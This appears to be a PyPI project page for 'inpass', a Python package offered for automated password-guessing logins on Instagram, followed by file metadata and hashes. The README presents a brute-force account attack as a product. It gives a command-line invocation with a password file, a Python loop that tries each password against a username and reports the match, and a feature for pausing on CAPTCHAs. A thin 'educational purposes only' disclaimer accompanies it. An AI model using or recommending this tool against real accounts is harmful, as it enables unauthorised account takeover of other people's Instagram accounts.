Automated login attempts for Instagram.
Project description
inpass 2.0.0
inpass is a Python package designed for automated login attempts on Instagram. This package can help automate the login process using multiple passwords, handle CAPTCHA challenges, and track URL changes during login attempts.
Features
- Automated login attempts for Instagram.
- Handles CAPTCHA challenges by pausing and allowing manual resolution.
- Tracks URL changes during the login process.
- Command-line interface (CLI) and programmatic usage supported.
Installation
You can install the package using pip:
pip install inpass
Usage
Command-line Interface
- You can use the inpass package directly from the command line. Here’s how:
inpass --username your_username --password-file passwords.txt
Programmatic Usage
- You can also use the inpass package programmatically in your Python scripts. Below is an example:
import time
import inpass
username = "your_username"
password_file = "passwords.txt"
with open(password_file, 'r') as file:
passwords = file.read().splitlines()
for password in passwords:
if inpass.login(username, password):
print(f"Password match: {password}")
break
else:
print(f"Password {password} not matching")
time.sleep(1)
else:
print("All passwords failed.")
License
This project is licensed under the MIT License. See the LICENSE file for details.
Acknowledgments
Thank you to all the contributors and users who have supported the development of this project.
Disclaimer
This package is intended for educational and research purposes only. The author is not responsible for any misuse of this software.
- Thank you for using inpass. We hope it helps you automate your login attempts efficiently.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file inpass-2.0.0.tar.gz.
File metadata
- Download URL: inpass-2.0.0.tar.gz
- Upload date:
- Size: 3.8 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.0.0 CPython/3.11.2
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
fa45a22e1ed6779d1b3c1bf1eedb10d7458d5ef48d04a94a6cb2cdb74b72b580
|
|
| MD5 |
cc9a1cd2f282294637d7ed98a60aa7bb
|
|
| BLAKE2b-256 |
4a83d9226ecafdc6184f75a238ff8f101448bd7bca14620bf0b615fdd9568b0b
|
File details
Details for the file inpass-2.0.0-py3-none-any.whl.
File metadata
- Download URL: inpass-2.0.0-py3-none-any.whl
- Upload date:
- Size: 4.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.0.0 CPython/3.11.2
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
bc252e5d68c534fbb09da8955dcc16cbce8278090ab71151731e5a3bd534d965
|
|
| MD5 |
8a67433b786144a640f3b9010c2cd0ae
|
|
| BLAKE2b-256 |
d7b7eb77b238b11aa3566b67b48e304c58a63ffd7be3c59893d22829e7d7e335
|